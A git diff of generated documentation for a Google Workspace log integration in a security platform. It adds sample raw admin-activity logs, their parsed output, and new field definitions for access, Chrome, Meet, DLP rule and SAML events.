diff --git a/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd.md b/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd.md index 8dc3e4606..3952fdd13 100644 --- a/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd.md +++ b/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd.md @@ -17,8 +17,8 @@ In details, the following table denotes the type of events produced by this inte | Name | Values | | ---- | ------ | | Kind | `` | -| Category | `authentication`, `configuration`, `file`, `iam`, `session` | -| Type | `access`, `admin`, `change`, `connection` | +| Category | `authentication`, `configuration`, `file`, `iam`, `session`, `web` | +| Type | `access`, `admin`, `allowed`, `change`, `connection`, `deletion`, `denied`, `info` | @@ -27,6 +27,61 @@ In details, the following table denotes the type of events produced by this inte This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog.md) and hunting activities in the [events page](/xdr/features/investigate/events.md). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma.md) and to leverage the full potential of the collected data. +=== "test_access_sample_1.json" + + ```json + + { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}", + "event": { + "action": "MONITOR_MODE_ACCESS_DENY_EVENT", + "dataset": "admin#reports#activity", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-11-07T14:23:22.470000Z", + "cloud": { + "account": { + "id": "C02i38lll" + } + }, + "google": { + "report": { + "access": { + "application": "GMAIL" + }, + "actor": { + "email": "john.doe@test.com" + } + } + }, + "network": { + "application": "context_aware_access" + }, + "related": { + "ip": [ + "9.3.2.1" + ], + "user": [ + "john.doe" + ] + }, + "source": { + "address": "9.3.2.1", + "ip": "9.3.2.1" + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "117564289545555555555", + "name": "john.doe" + } + } + + ``` + + === "test_admin_sample1.json" ```json @@ -374,6 +429,99 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_chrome_sample_1.json" + + ```json + + { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", + "event": { + "action": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "type": [ + "change" + ] + }, + "@timestamp": "2024-11-08T13:17:42.050000Z", + "cloud": { + "account": { + "id": "C01x70000" + } + }, + "device": { + "manufacturer": "Linux Foundation", + "model": { + "identifier": "0x2", + "name": "2.0 root hub" + } + }, + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097979777777" + } + } + + ``` + + +=== "test_chrome_sample_2.json" + + ```json + + { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", + "event": { + "action": "CHROME_OS_LOGIN_EVENT", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_KIOSK_SESSION_LOGIN", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-08T13:20:40Z", + "cloud": { + "account": { + "id": "C01x7c000" + } + }, + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097973333333333" + } + } + + ``` + + === "test_drive_sample.json" ```json @@ -567,6 +715,103 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_end_call.json" + + ```json + + { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Paris\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T12:07:37.366000Z", + "client": { + "geo": { + "country_iso_code": "FR", + "region_name": "Paris" + } + }, + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "ABCDEFGHIJ" + } + } + }, + "network": { + "application": "meet", + "transport": "udp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "tt.test@test.fr" + } + } + + ``` + + +=== "test_end_call_no_ip.json" + + ```json + + { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"98\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T11:32:12.301000Z", + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "BUSOHGFTVB" + } + } + }, + "network": { + "application": "meet", + "transport": "tcp" + }, + "user": { + "email": "tt.test@test.fr" + } + } + + ``` + + === "test_groups_entre_sample1.json" ```json @@ -661,13 +906,20 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "transport": "udp" }, "related": { + "ip": [ + "5555:333:333:5555:5555:5555:5555:5555" + ], "user": [ "jone.doe" ] }, + "source": { + "address": "5555:333:333:5555:5555:5555:5555:5555", + "ip": "5555:333:333:5555:5555:5555:5555:5555" + }, "user": { "domain": "test.com", - "email": "jone.doe@test.com", + "email": "joe.done@test.com", "id": "1098488062555", "name": "jone.doe" } @@ -727,6 +979,230 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_rules_sample_1.json" + + ```json + + { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "action_complete", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": "LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "113328670183616666666", + "name": "john.doe" + } + } + + ``` + + +=== "test_rules_sample_2.json" + + ```json + + { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "content_matched", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": "LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "11332867018361686666666", + "name": "john.doe" + } + } + + ``` + + +=== "test_saml_login_success.json" + + ```json + + { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:26:15.515000Z", + "cloud": { + "account": { + "id": "C00000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + "application": "saml" + }, + "related": { + "ip": [ + "2.1.3.2" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "2.1.3.2", + "ip": "2.1.3.2" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "10344515534360000000", + "name": "John.doe" + } + } + + ``` + + +=== "test_saml_login_success_1.json" + + ```json + + { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:24:58.191000Z", + "cloud": { + "account": { + "id": "C000000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS Client VPN", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + "application": "saml" + }, + "related": { + "ip": [ + "8.6.15.1" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "8.6.15.1", + "ip": "8.6.15.1" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "113844576558700000000", + "name": "John.doe" + } + } + + ``` + + === "test_suspend_user.json" ```json @@ -1050,11 +1526,13 @@ The following table lists the fields that are extracted, normalized under the EC |`event.action` | `keyword` | The action captured by the event. | |`event.category` | `keyword` | Event category. The second categorization field in the hierarchy. | |`event.dataset` | `keyword` | Name of the dataset. | +|`event.reason` | `keyword` | Reason why this event happened, according to the source | |`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | |`file.gid` | `keyword` | Primary group ID (GID) of the file. | |`file.name` | `keyword` | Name of the file including the extension, without the directory. | |`file.owner` | `keyword` | File owner's username. | |`file.type` | `keyword` | File type (file, dir, or symlink). | +|`google.report.access.application` | `keyword` | Application name | |`google.report.actor.email` | `keyword` | | |`google.report.chat.message.id` | `keyword` | Message id | |`google.report.chat.room.name` | `keyword` | Room name | @@ -1062,10 +1540,21 @@ The following table lists the fields that are extracted, normalized under the EC |`google.report.parameters.name` | `keyword` | Name of the item associated with the activity | |`google.report.parameters.value` | `keyword` | Value of the item associated with the activity | |`google.report.parameters.visibility` | `keyword` | Visibility of the Drive item associated with the activity | +|`google.report.rule.data_source` | `keyword` | Data source | +|`google.report.rule.name` | `keyword` | Name of the rule | +|`google.report.rule.scan_type` | `keyword` | Scan type | +|`google.report.rule.severity` | `keyword` | Severity of the rule | +|`google.report.rule.type` | `keyword` | Rule type | +|`google.report.saml.application_name` | `keyword` | Saml SP application name | +|`google.report.saml.initiator` | `keyword` | SAML requester of saml authentication | +|`google.report.saml.status_code` | `keyword` | SAML response status | |`google.report.token.app_name` | `keyword` | Token authorization application name | |`google.report.token.type` | `keyword` | Token type | +|`host.name` | `keyword` | Name of the host. | +|`host.os.full` | `keyword` | Operating system name, including the version or code name. | |`network.application` | `keyword` | Application level protocol name. | |`network.transport` | `keyword` | Protocol Name corresponding to the field `iana_number`. | +|`organization.name` | `keyword` | Organization name. | |`source.ip` | `ip` | IP address of the source. | |`user.domain` | `keyword` | Name of the directory the user is a member of. | |`user.email` | `keyword` | User email address. | diff --git a/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd_sample.md b/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd_sample.md index 7b964ab56..906050a77 100644 --- a/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd_sample.md +++ b/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd_sample.md @@ -4,6 +4,73 @@ In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. +=== "test_access_sample_1" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-11-07T14:23:22.470Z", + "uniqueQualifier": "-7203312395540000000", + "applicationName": "context_aware_access", + "customerId": "C02i38lll" + }, + "etag": "\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\"", + "actor": { + "callerType": "USER", + "email": "john.doe@test.com", + "profileId": "117564289545555555555" + }, + "ipAddress": "9.3.2.1", + "events": [ + { + "type": "CONTEXT_AWARE_ACCESS_USER_EVENT", + "name": "MONITOR_MODE_ACCESS_DENY_EVENT", + "parameters": [ + { + "name": "CAA_ACCESS_LEVEL_APPLIED", + "multiValue": [ + "is admin-approved IOS", + "is admin-approved android", + "Is Corporate Device" + ] + }, + { + "name": "CAA_ACCESS_LEVEL_UNSATISFIED", + "multiValue": [ + "is admin-approved android", + "Crowdstrike Compliant Device", + "is admin-approved IOS", + "Is Corporate Device" + ] + }, + { + "name": "CAA_APPLICATION", + "value": "GMAIL" + }, + { + "name": "BLOCKED_API_ACCESS", + "multiValue": [ + "GMAIL" + ] + }, + { + "name": "CAA_DEVICE_ID", + "value": "UNKNOWN" + }, + { + "name": "CAA_DEVICE_STATE", + "value": "No Device Signals" + } + ] + } + ] + } + ``` + + + === "test_admin_sample1" @@ -479,6 +546,142 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_chrome_sample_1" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-11-08T13:17:42.050Z", + "uniqueQualifier": "821596950209300000", + "applicationName": "chrome", + "customerId": "C01x70000" + }, + "etag": "\"M7TKrOH_7SmMcgNyv3m2zF\"", + "actor": { + "callerType": "USER", + "profileId": "105250506097979777777" + }, + "events": [ + { + "type": "CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE", + "name": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "parameters": [ + { + "name": "TIMESTAMP", + "intValue": "1731071860000" + }, + { + "name": "EVENT_REASON", + "value": "CHROMEOS_PERIPHERAL_STATUS_UPDATED" + }, + { + "name": "DEVICE_NAME", + "value": "S5NXNZ00A000000" + }, + { + "name": "CLIENT_TYPE", + "value": "CHROME_OS_DEVICE" + }, + { + "name": "DEVICE_PLATFORM", + "value": "ChromeOS 16033.51.0" + }, + { + "name": "DIRECTORY_DEVICE_ID", + "value": "4ebc77ae-ce6b-4857" + }, + { + "name": "ORG_UNIT_NAME", + "value": "test_org" + }, + { + "name": 